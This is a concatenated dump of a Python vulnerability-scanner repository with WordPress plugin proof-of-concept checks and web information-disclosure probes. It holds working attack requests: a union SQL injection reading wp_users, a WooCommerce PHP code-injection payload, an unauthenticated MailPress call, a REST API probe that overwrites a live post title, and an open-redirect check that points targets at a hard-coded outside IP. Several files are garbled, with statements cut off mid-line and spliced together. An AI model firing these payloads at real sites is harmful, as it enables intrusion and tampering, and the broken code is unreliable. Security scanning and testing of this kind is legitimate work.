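            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null%20/*!00000union*/%20select%201,2,/*!00000gRoup_ConCat(unhex(hex(Md5(1234))),0x3c2f62723e,unhex(hex(Md5(1234))))*/,4,5%20/*!00000from*/%20wp_users"
        vulnurl = self.url + payload
        try:
            # verify=False kept as in the original (presumably to tolerate self-signed target certificates).
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException:
            # Only transport failures are swallowed; the former bare ``except`` also
            # hid KeyboardInterrupt, SystemExit and programming errors.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
            return False
        if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
            cprint("[+]存在Wordpress AzonPop插件SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            return True
        cprint("[-]不存在wordpress_plugin_azonpop_sqli漏洞", "white", "on_grey")
        return False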
34 | 
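if __name__ == "__main__":
    # Mute all warnings (presumably the unverified-HTTPS notice raised by verify=False in run()).
    warnings.filterwarnings("ignore")
    # A usage line instead of an IndexError traceback when the URL argument is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <url>")
    testVuln = wordpress_plugin_azonpop_sqli_BaseVerify(sys.argv[1])
    testVuln.run()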
39 | 


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_plugin_mailpress_rce.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: wordpress 插件mailpress远程代码执行
 5 | referer: http://0day5.com/archives/3960
 6 | author: Lucifer
 7 | description: Mailpress存在越权调用,在不登陆的情况下,可以调用系统某些方法,造成远程命令执行。
 8 | '''
 9 | import re
10 | import sys
11 | import json
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 | 
16 | class wordpress_plugin_mailpress_rce_BaseVerify:
17 |     def __init__(self, url):
18 |         self.url = url
19 | 
20 |     def run(self):
21 |         headers = {
22 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 |         }
24 |         payload = "/wp-content/plugins/mailpress/mp-includes/action.php"
25 |         vulnurl = self.url + payload
26 |         post_data = {
27 |             "action":"autosave",
28 |             "id":0,
29 |             "revision":-1,
30 |             "toemail":"",
31 |             "toname":"",
32 |             "fromemail":"",
33 |             "fromname":"",
34 |             "to_list":1,
35 |             "Theme":"",
36 |             "subject":"", 
37 |             "html":"",
38 |             "plaintext":"",
39 |             "mail_format":"standard",
40 |             "autosave":1,
41 |         }
42 |         try:
43 |             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
44 |             start = req.text.find("可能不存在漏洞", "cyan")
58 | 
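if __name__ == "__main__":
    # Mute all warnings (presumably the unverified-HTTPS notice raised by verify=False in run()).
    warnings.filterwarnings("ignore")
    # A usage line instead of an IndexError traceback when the URL argument is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <url>")
    testVuln = wordpress_plugin_mailpress_rce_BaseVerify(sys.argv[1])
    testVuln.run()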


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_restapi_sqli.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: wordpress rest api权限失效导致内容注入
 5 | referer: https://www.t00ls.net/thread-38046-1-1.html
 6 | author: Lucifer
 7 | description: 篡改文章权限。
 8 | '''
 9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 | 
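class wordpress_restapi_sqli_BaseVerify:
    """Probe the WordPress REST API for the unauthenticated post-edit (content injection) issue.

    This is not a read-only check: after reading the id of the first post it
    POSTs a new title for that post, so an affected site shows a visible
    content change (the marker string) after the probe.
    """

    def __init__(self, url):
        # Base URL of the target, stored verbatim (no trailing-slash normalisation).
        self.url = url

    def run(self):
        """Look up a post id, attempt the edit, and print the verdict.

        Returns:
            True when the edit response carries a ``data.status`` other than
            400/401; False otherwise, including on transport errors or when
            either response is not JSON of the expected shape.
        """
        user_agent = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        headers = {
            "User-Agent": user_agent
        }
        headers2 = {
            "User-Agent": user_agent,
            "Content-Type": "application/json"
        }
        payload = "/index.php/wp-json/wp/v2/posts"
        vulnurl = self.url + payload
        try:
            # verify=False kept as in the original (presumably to tolerate self-signed target certificates).
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            d = json.loads(req.text)
            id_code = d[0]['id']
            vulnurl = self.url + "/index.php/wp-json/wp/v2/posts/"+str(id_code)+"?id="+str(id_code)+"a"
            post_data = {
                "title":"81dc9bdb52d04dc20036dbd8313ed055"
            }
            req = requests.post(vulnurl, data=json.dumps(post_data), headers=headers2, timeout=10, verify=False)
            d = json.loads(req.text)
            status = d['data']['status']
        except (requests.RequestException, ValueError, LookupError, TypeError):
            # Transport errors, non-JSON bodies and unexpected JSON shapes end here;
            # the former bare ``except`` also swallowed KeyboardInterrupt/SystemExit.
            # NOTE(review): a response with no ``data`` object (presumably what a
            # successful edit returns, i.e. the post itself) also lands here and is
            # reported as "maybe not vulnerable"; confirm whether that verdict is intended.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
            return False
        if status != 401 and status != 400:
            cprint("[+]存在wordpress rest api权限失效导致内容注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            return True
        cprint("[-]不存在wordpress_restapi_sqli漏洞", "white", "on_grey")
        return False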
49 | 
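if __name__ == "__main__":
    # Mute all warnings (presumably the unverified-HTTPS notice raised by verify=False in run()).
    warnings.filterwarnings("ignore")
    # A usage line instead of an IndexError traceback when the URL argument is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <url>")
    testVuln = wordpress_restapi_sqli_BaseVerify(sys.argv[1])
    testVuln.run()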
54 | 


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_url_redirect.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: wordpress插件跳转
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: feed-statistics.php中参数url未经过验证可跳转任意网站。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
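class wordpress_url_redirect_BaseVerify:
    """Probe the feed-statistics plugin for an open redirect through its ``url`` parameter.

    The ``url`` value is base64 and decodes to an address on a third-party host
    that is not part of this project; the check relies on the redirect being
    followed (requests' default) and on that host serving the marker string.
    Two consequences for anyone running this: the scan target is disclosed to
    that host, and a negative verdict says nothing if the host no longer
    serves the marker.
    """

    def __init__(self, url):
        # Base URL of the target, stored verbatim (no trailing-slash normalisation).
        self.url = url

    def run(self):
        """Send one GET request (redirects followed) and print the verdict.

        Returns:
            True when the final body contains ``100e8a82eea1ef8416e585433fd8462e``;
            False otherwise, including when the request fails
            (reported as "可能不存在漏洞").
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovLzQ1Ljc2LjE1OC45MS9zc3Jm"
        vulnurl = self.url + payload
        try:
            # verify=False kept as in the original (presumably to tolerate self-signed target certificates).
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException:
            # Only transport failures are swallowed; the former bare ``except`` also
            # hid KeyboardInterrupt, SystemExit and programming errors.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
            return False
        if r"100e8a82eea1ef8416e585433fd8462e" in req.text:
            cprint("[+]存在wordpress插件跳转漏洞...(低危)\tpayload: "+vulnurl, "blue")
            return True
        cprint("[-]不存在wordpress_url_redirect漏洞", "white", "on_grey")
        return False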
34 | 
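if __name__ == "__main__":
    # Mute all warnings (presumably the unverified-HTTPS notice raised by verify=False in run()).
    warnings.filterwarnings("ignore")
    # A usage line instead of an IndexError traceback when the URL argument is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <url>")
    testVuln = wordpress_url_redirect_BaseVerify(sys.argv[1])
    testVuln.run()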
39 | 


--------------------------------------------------------------------------------
/POC_Scan/cms/wordpress/wordpress_woocommerce_code_exec.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: wordpress 插件WooCommerce PHP代码注入
 5 | referer: https://packetstormsecurity.com/files/135000/WordPress-WooCommerce-2.4.12-PHP-Code-Injection.html
 6 | author: Lucifer
 7 | description: 插件WooCommerce中,参数items_per_page存在PHP代码注入。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
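class wordpress_woocommerce_code_exec_BaseVerify:
    """Probe the WooCommerce ``items_per_page`` parameter for PHP code injection.

    The parameter value asks PHP to print ``md5(1234)``; finding that digest in
    the response means the value was evaluated as code rather than used as a
    number, which is the indicator this check reports on.
    """

    def __init__(self, url):
        # Base URL of the target, stored verbatim (no trailing-slash normalisation).
        self.url = url

    def run(self):
        """Send one GET request and print the verdict.

        Returns:
            True when the body contains the MD5 digest of ``1234``
            (``81dc9bdb52d04dc20036dbd8313ed055``); False otherwise, including
            when the request fails (reported as "可能不存在漏洞").
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/produits/?items_per_page=%24%7b%40print(md5(1234))%7d&setListingType=grid"
        vulnurl = self.url + payload
        try:
            # verify=False kept as in the original (presumably to tolerate self-signed target certificates).
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
        except requests.RequestException:
            # Only transport failures are swallowed; the former bare ``except`` also
            # hid KeyboardInterrupt, SystemExit and programming errors.
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
            return False
        if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
            cprint("[+]存在wordpress 插件WooCommerce PHP代码注入漏洞...(高危)\tpayload: "+vulnurl, "red")
            return True
        cprint("[-]不存在wordpress_woocommerce_code_exec漏洞", "white", "on_grey")
        return False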
34 | 
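if __name__ == "__main__":
    # Mute all warnings (presumably the unverified-HTTPS notice raised by verify=False in run()).
    warnings.filterwarnings("ignore")
    # A usage line instead of an IndexError traceback when the URL argument is missing.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <url>")
    testVuln = wordpress_woocommerce_code_exec_BaseVerify(sys.argv[1])
    testVuln.run()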


--------------------------------------------------------------------------------
/POC_Scan/information/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/apache_server_status_disclosure.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/apache_server_status_disclosure.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/apache_server_status_disclosure.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/apache_server_status_disclosure.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/crossdomain_find.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/crossdomain_find.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/crossdomain_find.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/crossdomain_find.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/git_check.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/git_check.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/git_check.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/git_check.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/informationmain.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/informationmain.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/informationmain.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/informationmain.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/jetbrains_ide_workspace_disclosure.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/jetbrains_ide_workspace_disclosure.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/jetbrains_ide_workspace_disclosure.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/jetbrains_ide_workspace_disclosure.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/jsp_conf_find.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/jsp_conf_find.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/jsp_conf_find.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/jsp_conf_find.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/options_method.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/options_method.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/options_method.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/options_method.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/robots_find.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/robots_find.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/robots_find.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/robots_find.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/springboot_api.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/springboot_api.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/springboot_api.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/springboot_api.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/svn_check.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/svn_check.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/__pycache__/svn_check.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/svn_check.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/apache_server_status_disclosure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: apache server-status信息泄露
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: apache的状态信息文件泄露。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
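class apache_server_status_disclosure_BaseVerify:
    """Probe for an exposed Apache ``mod_status`` page at ``/server-status``.

    The page lists in-flight requests, client addresses and server uptime, which is
    why an unrestricted one is reported as a (low severity) information leak.

    Attributes:
        url: Base URL of the target (scheme://host[:port][/path]).
        timeout: Per-request timeout in seconds handed to ``requests``.
    """

    PAYLOAD = "/server-status"
    USER_AGENT = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"

    def __init__(self, url, timeout=10):
        self.url = url
        self.timeout = timeout

    def _target_url(self):
        """Build the probe URL without producing ``//`` when ``url`` ends in a slash."""
        return self.url.rstrip("/") + self.PAYLOAD

    @staticmethod
    def _looks_vulnerable(status_code, body):
        """True for a 200 response carrying both mod_status page markers."""
        return status_code == 200 and "Server uptime" in body and "Server Status" in body

    def run(self):
        """Send the probe, print the verdict and return it.

        Returns:
            True when the status page is exposed, False when it is not, None when the
            request itself failed (DNS/connection error, timeout, malformed URL).
        """
        vulnurl = self._target_url()
        try:
            # verify=False is deliberate for a scanner: targets often present
            # self-signed or mismatched certificates and TLS is not what is tested.
            req = requests.get(vulnurl, headers={"User-Agent": self.USER_AGENT},
                               timeout=self.timeout, verify=False)
        except Exception as exc:  # boundary: one broken target must not abort a batch
            cprint("[-] "+__file__+"====>可能不存在漏洞 ("+type(exc).__name__+": "+str(exc)+")", "cyan")
            return None
        if self._looks_vulnerable(req.status_code, req.text):
            cprint("[+]存在apache server-status信息泄露...(低危)\tpayload: "+vulnurl, "green")
            return True
        cprint("[-]不存在apache_server_status_disclosure漏洞", "white", "on_grey")
        return False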
34 | 
35 | 
if __name__ == "__main__":
    # CLI usage: python apache_server_status_disclosure.py <base-url>
    # Suppress all warnings, such as the TLS ones triggered by verify=False in run().
    warnings.filterwarnings("ignore")
    apache_server_status_disclosure_BaseVerify(sys.argv[1]).run()


--------------------------------------------------------------------------------
/POC_Scan/information/crossdomain_find.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: crossdomain.xml文件发现
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: crossdomain.xml 配置过宽(例如 allow-access-from domain="*")时,任意站点加载的 Flash 内容均可跨域读取本站响应。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
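class crossdomain_find_BaseVerify:
    """Look for a Flash cross-domain policy file at ``/crossdomain.xml``.

    Finding the file is informational only; the real issue is an over-broad
    ``allow-access-from`` entry (e.g. ``domain="*"``), which must be confirmed by
    reading the file -- this check does not evaluate the policy itself.

    Attributes:
        url: Base URL of the target (scheme://host[:port][/path]).
        timeout: Per-request timeout in seconds handed to ``requests``.
    """

    PAYLOAD = "/crossdomain.xml"
    USER_AGENT = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"

    def __init__(self, url, timeout=10):
        self.url = url
        self.timeout = timeout

    def _target_url(self):
        """Build the probe URL without producing ``//`` when ``url`` ends in a slash."""
        return self.url.rstrip("/") + self.PAYLOAD

    @staticmethod
    def _looks_vulnerable(status_code, body):
        """True for a 200 body that contains an ``allow-access-from`` element.

        The previous check also tested ``r"" in body``, which is always true (the
        literal is empty, presumably a lost element name), so it added nothing; the
        status check replaces it so 404/error pages are not reported.
        """
        return status_code == 200 and "allow-access-from" in body

    def run(self):
        """Send the probe, print the verdict and return it.

        Returns:
            True when the policy file is served, False when it is not, None when the
            request itself failed.
        """
        vulnurl = self._target_url()
        try:
            # verify=False is deliberate for a scanner (bad certs are common on targets).
            req = requests.get(vulnurl, headers={"User-Agent": self.USER_AGENT},
                               timeout=self.timeout, verify=False)
        except Exception as exc:  # boundary: one broken target must not abort a batch
            cprint("[-] "+__file__+"====>可能不存在漏洞 ("+type(exc).__name__+": "+str(exc)+")", "cyan")
            return None
        if self._looks_vulnerable(req.status_code, req.text):
            cprint("[+]存在crossdomain.xml文件发现漏洞...(信息)\tpayload: "+vulnurl, "green")
            return True
        cprint("[-]不存在crossdomain_find漏洞", "white", "on_grey")
        return False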
34 | 
35 | 
if __name__ == "__main__":
    # CLI usage: python crossdomain_find.py <base-url>
    # Suppress all warnings, such as the TLS ones triggered by verify=False in run().
    warnings.filterwarnings("ignore")
    crossdomain_find_BaseVerify(sys.argv[1]).run()
40 | 


--------------------------------------------------------------------------------
/POC_Scan/information/git_check.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: git源码泄露扫描
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: 忘记了删除.git目录而导致的漏洞。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
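class git_check_BaseVerify:
    """Detect a deployed ``.git`` directory by fetching ``/.git/config``.

    The config file is requested rather than the directory because directory
    indexing is commonly disabled while individual files are still served. A
    readable repository usually allows full source recovery, hence high severity.

    Attributes:
        url: Base URL of the target (scheme://host[:port][/path]).
        timeout: Per-request timeout in seconds handed to ``requests``.
    """

    PAYLOAD = "/.git/config"
    USER_AGENT = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"

    def __init__(self, url, timeout=10):
        self.url = url
        self.timeout = timeout

    def _target_url(self):
        """Build the probe URL without producing ``//`` when ``url`` ends in a slash."""
        return self.url.rstrip("/") + self.PAYLOAD

    @staticmethod
    def _looks_vulnerable(status_code, body):
        """True for a 200 body containing the ``[core]`` key every git config has."""
        return status_code == 200 and "repositoryformatversion" in body

    def run(self):
        """Send the probe, print the verdict and return it.

        Returns:
            True when the git config is served, False when it is not, None when the
            request itself failed.
        """
        vulnurl = self._target_url()
        try:
            # verify=False is deliberate for a scanner (bad certs are common on targets).
            req = requests.get(vulnurl, headers={"User-Agent": self.USER_AGENT},
                               timeout=self.timeout, verify=False)
        except Exception as exc:  # boundary: one broken target must not abort a batch
            cprint("[-] "+__file__+"====>可能不存在漏洞 ("+type(exc).__name__+": "+str(exc)+")", "cyan")
            return None
        if self._looks_vulnerable(req.status_code, req.text):
            cprint("[+]存在git源码泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
            return True
        cprint("[-]不存在git_check漏洞", "white", "on_grey")
        return False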
34 | 
35 | 
if __name__ == "__main__":
    # CLI usage: python git_check.py <base-url>
    # Suppress all warnings, such as the TLS ones triggered by verify=False in run().
    warnings.filterwarnings("ignore")
    git_check_BaseVerify(sys.argv[1]).run()
40 | 


--------------------------------------------------------------------------------
/POC_Scan/information/informationmain.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | '''
 5 | name: information漏洞库
 6 | referer: unknow
 7 | author: Lucifer
 8 | description: 包含所有information漏洞类型,封装成一个模块
 9 | '''
10 | 
11 | from POC_Scan.information.springboot_api import springboot_api_BaseVerify
12 | from POC_Scan.information.options_method import options_method_BaseVerify
13 | from POC_Scan.information.robots_find import robots_find_BaseVerify
14 | from POC_Scan.information.git_check import git_check_BaseVerify
15 | from POC_Scan.information.jsp_conf_find import jsp_conf_find_BaseVerify
16 | from POC_Scan.information.svn_check import svn_check_BaseVerify
17 | from POC_Scan.information.jetbrains_ide_workspace_disclosure import jetbrains_ide_workspace_disclosure_BaseVerify
18 | from POC_Scan.information.apache_server_status_disclosure import apache_server_status_disclosure_BaseVerify
19 | from POC_Scan.information.crossdomain_find import crossdomain_find_BaseVerify
20 | 


--------------------------------------------------------------------------------
/POC_Scan/information/jetbrains_ide_workspace_disclosure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: JetBrains IDE workspace.xml文件泄露
 5 | referer: http://www.ab156.com/vul/view/vulid/3631.html
 6 | author: Lucifer
 7 | description: 网站存在JetBrains系列IDE的工作区文件,可以泄露整个工程的目录结构信息。通过下载workspace.xml,可直接获取整个工程的目录结构,发现敏感文件,为渗透中收集信息、发现漏洞提供了极大的便利。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class jetbrains_ide_workspace_disclosure_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         payload = "/.idea/workspace.xml"
23 |         vulnurl = self.url + payload
24 |         try:
25 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |             if r"可能不存在漏洞", "cyan")
34 | 
35 | 
if __name__ == "__main__":
    # CLI usage: python jetbrains_ide_workspace_disclosure.py <base-url>
    # Suppress all warnings, such as the TLS ones triggered by verify=False in run().
    warnings.filterwarnings("ignore")
    jetbrains_ide_workspace_disclosure_BaseVerify(sys.argv[1]).run()


--------------------------------------------------------------------------------
/POC_Scan/information/jsp_conf_find.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: java配置文件文件发现
 5 | referer: unknow
 6 | author: Lucifer
 7 | description: web.xml是java框架使用的配置文件,可以获取敏感信息
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
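class jsp_conf_find_BaseVerify:
    """Check whether ``/WEB-INF/web.xml`` is served by the target.

    Servlet containers must never serve ``WEB-INF``; a readable deployment
    descriptor reveals servlet mappings, security constraints and init parameters.

    Attributes:
        url: Base URL of the target (scheme://host[:port][/path]).
        timeout: Per-request timeout in seconds handed to ``requests``.
    """

    PAYLOAD = "/WEB-INF/web.xml"
    USER_AGENT = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"

    def __init__(self, url, timeout=10):
        self.url = url
        self.timeout = timeout

    def _target_url(self):
        """Build the probe URL without producing ``//`` when ``url`` ends in a slash."""
        return self.url.rstrip("/") + self.PAYLOAD

    @staticmethod
    def _looks_vulnerable(status_code, content_type, body):
        """True for a 200 reply that is XML or visibly a deployment descriptor.

        The media type is compared without its parameters: the earlier exact
        comparison against ``application/xml`` missed the very common
        ``application/xml; charset=UTF-8`` and ``text/xml`` forms.  A ``<web-app``
        root element is accepted as well for servers that serve the file with a
        generic type.
        """
        if status_code != 200:
            return False
        media_type = (content_type or "").split(";", 1)[0].strip().lower()
        return media_type in ("application/xml", "text/xml") or "<web-app" in body

    def run(self):
        """Send the probe, print the verdict and return it.

        Returns:
            True when web.xml is served, False when it is not, None when the request
            itself failed.
        """
        vulnurl = self._target_url()
        try:
            # verify=False is deliberate for a scanner (bad certs are common on targets).
            req = requests.get(vulnurl, headers={"User-Agent": self.USER_AGENT},
                               timeout=self.timeout, verify=False)
        except Exception as exc:  # boundary: one broken target must not abort a batch
            cprint("[-] "+__file__+"====>可能不存在漏洞 ("+type(exc).__name__+": "+str(exc)+")", "cyan")
            return None
        # .get(): a missing Content-Type header used to raise KeyError and be swallowed.
        if self._looks_vulnerable(req.status_code, req.headers.get("Content-Type", ""), req.text):
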